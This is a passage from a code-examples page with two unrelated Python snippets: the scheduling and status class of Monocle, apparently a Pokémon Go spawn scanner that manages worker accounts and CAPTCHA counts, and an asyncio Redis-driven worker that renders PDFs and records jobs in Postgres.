        A = simulating app startup
        T = completing the tutorial
        X = something bad happened
        C = CAPTCHA

        Other letters: various errors and procedures
        """
        dots = []
        messages = []
        row = []
        for i, worker in enumerate(self.workers):
            if i > 0 and i % conf.GRID[1] == 0:
                dots.append(row)
                row = []
            if worker.error_code in BAD_STATUSES:
                row.append('X')
                messages.append(worker.status.ljust(20))
            elif worker.error_code:
                row.append(worker.error_code[0])
            else:
                row.append('.')
        if row:
            dots.append(row)
        return dots, messages

    def update_coroutines_count(self, simple=True, loop=LOOP):
        try:
            tasks = Task.all_tasks(loop)
            self.coroutines_count = len(tasks) if simple else sum(not t.done() for t in tasks)
        except RuntimeError:
            # Set changed size during iteration
            self.coroutines_count = '-1'

    def _print_status(self, _ansi=ANSI, _start=datetime.now(), _notify=conf.NOTIFY):
        running_for = datetime.now() - _start

        seconds_since_start = running_for.seconds - self.idle_seconds or 0.1
        hours_since_start = seconds_since_start / 3600

        output = [
            '{}Monocle running for {}'.format(_ansi, running_for),
            self.counts,
            self.stats,
            self.pokemon_found,
            ('Visits: {}, per second: {:.2f}\n'
             'Skipped: {}, unnecessary: {}').format(
                self.visits, self.visits / seconds_since_start,
                self.skipped, self.redundant)
        ]

        try:
            seen = Worker.g['seen']
            captchas = Worker.g['captchas']
            output.append('Seen per visit: {v:.2f}, per minute: {m:.0f}'.format(
                v=seen / self.visits, m=seen / (seconds_since_start / 60)))

            if captchas:
                captchas_per_request = captchas / (self.visits / 1000)
                captchas_per_hour = captchas / hours_since_start
                output.append(
                    'CAPTCHAs per 1K visits: {r:.1f}, per hour: {h:.1f}, total: {t:d}'.format(
                    r=captchas_per_request, h=captchas_per_hour, t=captchas))
        except ZeroDivisionError:
            pass

        try:
            hash_status = HashServer.status
            output.append('Hashes: {}/{}, refresh in {:.0f}'.format(
                hash_status['remaining'],
                hash_status['maximum'],
                hash_status['period'] - time()
            ))
        except (KeyError, TypeError):
            pass

        if _notify:
            sent = Worker.notifier.sent
            output.append('Notifications sent: {}, per hour {:.1f}'.format(
                sent, sent / hours_since_start))

        output.append('')
        if not self.all_seen:
            no_sightings = ', '.join(str(w.worker_no)
                                     for w in self.workers
                                     if w.total_seen == 0)
            if no_sightings:
                output += ['Workers without sightings so far:', no_sightings, '']
            else:
                self.all_seen = True

        dots, messages = self.get_dots_and_messages()
        output += [' '.join(row) for row in dots]
        previous = 0
        for i in range(4, len(messages) + 4, 4):
            output.append('\t'.join(messages[previous:i]))
            previous = i
        if self.paused:
            output.append('\nCAPTCHAs are needed to proceed.')
        if not _ansi:
            system('cls')
        print('\n'.join(output))

    def longest_running(self):
        workers = (x for x in self.workers if x.start_time)
        worker = next(workers)
        earliest = worker.start_time
        for w in workers:
            if w.start_time < earliest:
                worker = w
                earliest = w.start_time
        minutes = ((time() * 1000) - earliest) / 60000
        return worker, minutes

    def get_start_point(self):
        smallest_diff = float('inf')
        now = time() % 3600
        closest = None

        for spawn_id, spawn_time in spawns.known.values():
            time_diff = now - spawn_time
            if 0 < time_diff < smallest_diff:
                smallest_diff = time_diff
                closest = spawn_id
            if smallest_diff < 3:
                break
        return closest

    async def update_spawns(self, initial=False):
        while True:
            try:
                await run_threaded(spawns.update)
                LOOP.create_task(run_threaded(spawns.pickle))
            except OperationalError as e:
                self.log.exception('Operational error while trying to update spawns.')
                if initial:
                    raise OperationalError('Could not update spawns, ensure your DB is set up.') from e
                await sleep(15, loop=LOOP)
            except CancelledError:
                raise
            except Exception as e:
                self.log.exception('A wild {} appeared while updating spawns!', e.__class__.__name__)
                await sleep(15, loop=LOOP)
            else:
                break

    async def launch(self, bootstrap, pickle):
        exceptions = 0
        self.next_mystery_reload = 0

        if not pickle or not spawns.unpickle():
            await self.update_spawns(initial=True)

        if not spawns or bootstrap:
            try:
                await self.bootstrap()
                await self.update_spawns()
            except CancelledError:
                return

        update_spawns = False
        self.mysteries = spawns.mystery_gen()
        while True:
            try:
                await self._launch(update_spawns)
                update_spawns = True
            except CancelledError:
                return
            except Exception:
                exceptions += 1
                if exceptions > 25:
                    self.log.exception('Over 25 errors occured in launcher loop, exiting.')
                    return False
                else:
                    self.log.exception('Error occured in launcher loop.')
                    update_spawns = False

    async def _launch(self, update_spawns):
        if update_spawns:
            await self.update_spawns()
            LOOP.create_task(run_threaded(dump_pickle, 'accounts', ACCOUNTS))
            spawns_iter = iter(spawns.items())
        else:
            start_point = self.get_start_point()
            if start_point and not spawns.after_last():
                spawns_iter = dropwhile(
                    lambda s: s[1][0] != start_point, spawns.items())
            else:
                spawns_iter = iter(spawns.items())

        current_hour = get_current_hour()
        if spawns.after_last():
            current_hour += 3600

        captcha_limit = conf.MAX_CAPTCHAS
        skip_spawn = conf.SKIP_SPAWN
        for point, (spawn_id, spawn_seconds) in spawns_iter:
            try:
                if self.captcha_queue.qsize() > captcha_limit:
                    self.paused = True
                    self.idle_seconds += await run_threaded(self.captcha_queue.full_wait, conf.MAX_CAPTCHAS)
                    self.paused = False
            except (EOFError, BrokenPipeError, FileNotFoundError):
                pass

            spawn_time = spawn_seconds + current_hour

            # negative = hasn't happened yet
            # positive = already happened
            time_diff = time() - spawn_time

            while time_diff < 0.5:
                try:
                    mystery_point = next(self.mysteries)

                    await self.coroutine_semaphore.acquire()
                    LOOP.create_task(self.try_point(mystery_point))
                except StopIteration:
                    if self.next_mystery_reload < monotonic():
                        self.mysteries = spawns.mystery_gen()
                        self.next_mystery_reload = monotonic() + conf.RESCAN_UNKNOWN
                    else:
                        await sleep(min(spawn_time - time() + .5, self.next_mystery_reload - monotonic()), loop=LOOP)
                time_diff = time() - spawn_time

            if time_diff > 5 and spawn_id in SIGHTING_CACHE.store:
                self.redundant += 1
                continue
            elif time_diff > skip_spawn:
                self.skipped += 1
                continue

            await self.coroutine_semaphore.acquire()
            LOOP.create_task(self.try_point(point, spawn_time, spawn_id))

    async def try_again(self, point):
        async with self.coroutine_semaphore:
            worker = await self.best_worker(point, False)
            async with worker.busy:
                if await worker.visit(point):
                    self.visits += 1

    async def bootstrap(self):
        try:
            self.log.warning('Starting bootstrap phase 1.')
            await self.bootstrap_one()
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred during bootstrap phase 1.')

        try:
            self.log.warning('Starting bootstrap phase 2.')
            await self.bootstrap_two()
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred during bootstrap phase 2.')

        self.log.warning('Starting bootstrap phase 3.')
        unknowns = list(spawns.unknown)
        shuffle(unknowns)
        tasks = (self.try_again(point) for point in unknowns)
        await gather(*tasks, loop=LOOP)
        self.log.warning('Finished bootstrapping.')

    async def bootstrap_one(self):
        async def visit_release(worker, num, *args):
            async with self.coroutine_semaphore:
                async with worker.busy:
                    point = get_start_coords(num, *args)
                    self.log.warning('start_coords: {}', point)
                    self.visits += await worker.bootstrap_visit(point)

        if bounds.multi:
            areas = [poly.polygon.area for poly in bounds.polygons]
            area_sum = sum(areas)
            percentages = [area / area_sum for area in areas]
            tasks = []
            for i, workers in enumerate(percentage_split(
                    self.workers, percentages)):
                grid = best_factors(len(workers))
                tasks.extend(visit_release(w, n, grid, bounds.polygons[i])
                             for n, w in enumerate(workers))
        else:
            tasks = (visit_release(w, n) for n, w in enumerate(self.workers))
        await gather(*tasks, loop=LOOP)

    async def bootstrap_two(self):
        async def bootstrap_try(point):
            async with self.coroutine_semaphore:
                randomized = randomize_point(point, randomization)
                LOOP.call_later(1790, LOOP.create_task, self.try_again(randomized))
                worker = await self.best_worker(point, False)
                async with worker.busy:
                    self.visits += await worker.bootstrap_visit(point)

        # randomize to within ~140m of the nearest neighbor on the second visit
        randomization = conf.BOOTSTRAP_RADIUS / 155555 - 0.00045
        tasks = (bootstrap_try(x) for x in get_bootstrap_points(bounds))
        await gather(*tasks, loop=LOOP)

    async def try_point(self, point, spawn_time=None, spawn_id=None):
        try:
            point = randomize_point(point)
            skip_time = monotonic() + (conf.GIVE_UP_KNOWN if spawn_time else conf.GIVE_UP_UNKNOWN)
            worker = await self.best_worker(point, skip_time)
            if not worker:
                if spawn_time:
                    self.skipped += 1
                return
            async with worker.busy:
                if spawn_time:
                    worker.after_spawn = time() - spawn_time

                if await worker.visit(point, spawn_id):
                    self.visits += 1
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred in try_point')
        finally:
            self.coroutine_semaphore.release()

    async def best_worker(self, point, skip_time):
        good_enough = conf.GOOD_ENOUGH
        while self.running:
            gen = (w for w in self.workers if not w.busy.locked())
            try:
                worker = next(gen)
                lowest_speed = worker.travel_speed(point)
            except StopIteration:
                lowest_speed = float('inf')
            for w in gen:
                speed = w.travel_speed(point)
                if speed < lowest_speed:
                    lowest_speed = speed
                    worker = w
                    if speed < good_enough:
                        break
            if lowest_speed < conf.SPEED_LIMIT:
                worker.speed = lowest_speed
                return worker
            if skip_time and monotonic() > skip_time:
                return None
            await sleep(conf.SEARCH_SLEEP, loop=LOOP)

    def refresh_dict(self):
        while not self.extra_queue.empty():
            account = self.extra_queue.get()
            username = account['username']
            ACCOUNTS[username] = account
Esempio n. 37
0
class Worker:
    def __init__(self, loop=None):
        logger.info('Worker initialising...')
        loop = loop or asyncio.get_event_loop()
        self.loop = loop
        logger.debug('Connecting to db: "%s"', DB_DSN)
        self._pool = loop.run_until_complete(create_pool(dsn=DB_DSN, loop=loop, minsize=2, maxsize=10))
        self.wkh2p_sema = Semaphore(value=MAX_WORKER_THREADS, loop=loop)
        self.worker_sema = Semaphore(value=MAX_WORKER_JOBS, loop=loop)
        self.redis = None
        self.exc_info = None

    def run_forever(self):
        self.loop.run_until_complete(self.work_loop())

    async def work_loop(self):
        # TODO deal with SIGTERM gracefully
        logger.debug('Connecting to redis on: "%s"', REDIS_HOST)
        self.redis = await aioredis.create_redis((REDIS_HOST, 6379), loop=self.loop)
        logger.info('Worker started...')
        try:
            while True:
                await self.worker_sema.acquire()
                queue, data = await self.redis.blpop(*QUEUES)
                self.loop.create_task(self.work_handler(queue, data))
        finally:
            self.redis.close()

    async def work_handler(self, queue, raw_data):
        try:
            await self.work(queue, raw_data)
        except:
            logger.error('error processing job: %s', sys.exc_info()[1])
            self.exc_info = sys.exc_info()
            raise

    async def work(self, queue_raw, raw_data):
        """
        Do job, data shape:
        {
            'job_id': UUID of job,
            THEN
            'content': JSON object to use in template
            OR
            'html': HTML to generate pdf for
        }
        :param queue_raw: queue name bytes
        :param raw_data: json bytes
        :return:
        """
        queue = queue_raw.decode()
        data = raw_data.decode()
        logger.debug('starting job from queue "%s" with data "%s"', queue, data)
        data = json.loads(data)
        job_id = data['job_id']
        org_code, env_id = await self.get_basic_info(job_id)
        logger.info('starting job - %s for %s', job_id, org_code)
        await self.job_in_progress(job_id)
        content = data.get('content')
        if content:
            raise NotImplementedError()
            # TODO generate html
        else:
            html = data['html']
        await self.wkh2p_sema.acquire()
        pdf_file = await self.loop.run_in_executor(None, generate_pdf, html)
        self.wkh2p_sema.release()
        logger.info('pdf generated - %s for %s', job_id, org_code)

        # the temporary file is not automatically deleted, so we need to make sure we do it here
        try:
            file_size = os.path.getsize(pdf_file)
            await store_file(job_id, org_code, pdf_file)
        finally:
            os.remove(pdf_file)
        await self.job_finished(job_id, html, file_size)
        logger.info('finishing job - %s for %s', job_id, org_code)
        self.worker_sema.release()

    async def job_in_progress(self, job_id):
        ctx = [JobStatus.STATUS_IN_PROGRESS, job_id]
        await self.execute('UPDATE jobs_job SET status=%s, timestamp_started=current_timestamp WHERE id=%s;', ctx)

    async def job_finished(self, job_id, html, file_size):
        ctx = [JobStatus.STATUS_COMPLETE, html, file_size, job_id]
        await self.execute('UPDATE jobs_job SET status=%s, timestamp_complete=current_timestamp, '
                           'html=%s, file_size=%s WHERE id=%s;', ctx)

    async def get_basic_info(self, job_id):
        cur = await self.execute(
            'SELECT orgs_organisation.code, resources_env.id FROM orgs_organisation '
            'INNER JOIN resources_env ON orgs_organisation.id = resources_env.org_id '
            'INNER JOIN jobs_job ON resources_env.id = jobs_job.env_id WHERE '
            'jobs_job.id = %s', [job_id])
        org, env_id = await cur.fetchone()
        return org, env_id

    async def get_env_info(self, job_id, env_id):
        cur = await self.execute(
            'SELECT r_main.ref AS main_ref, r_main.file AS main_file, '
            'r_base.ref as base_ref, r_base.file as base_file, '
            'r_base.ref as header_ref, r_header.file as header_file, '
            'r_base.ref as footer_ref, r_footer.file as footer_file '
            'FROM resources_env '
            'JOIN resources_file AS r_main ON r_main.id = resources_env.main_template_id '
            'JOIN resources_file AS r_base ON r_base.id = resources_env.base_template_id '
            'JOIN resources_file AS r_header ON r_header.id = resources_env.header_template_id '
            'JOIN resources_file AS r_footer ON r_footer.id = resources_env.footer_template_id '
            'WHERE resources_env.id = %s', [env_id], dict_cursor=True)
        data = dict(await cur.fetchone())
        print(data)
        # FIXME, work stopped here

    @asyncio.coroutine
    def execute(self, *args, **kwargs):
        cursor_factory = kwargs.pop('dict_cursor', None) and DictCursor
        with (yield from self._pool) as conn:
            cur = yield from conn.cursor(cursor_factory=cursor_factory)
            yield from cur.execute(*args, **kwargs)
            return cur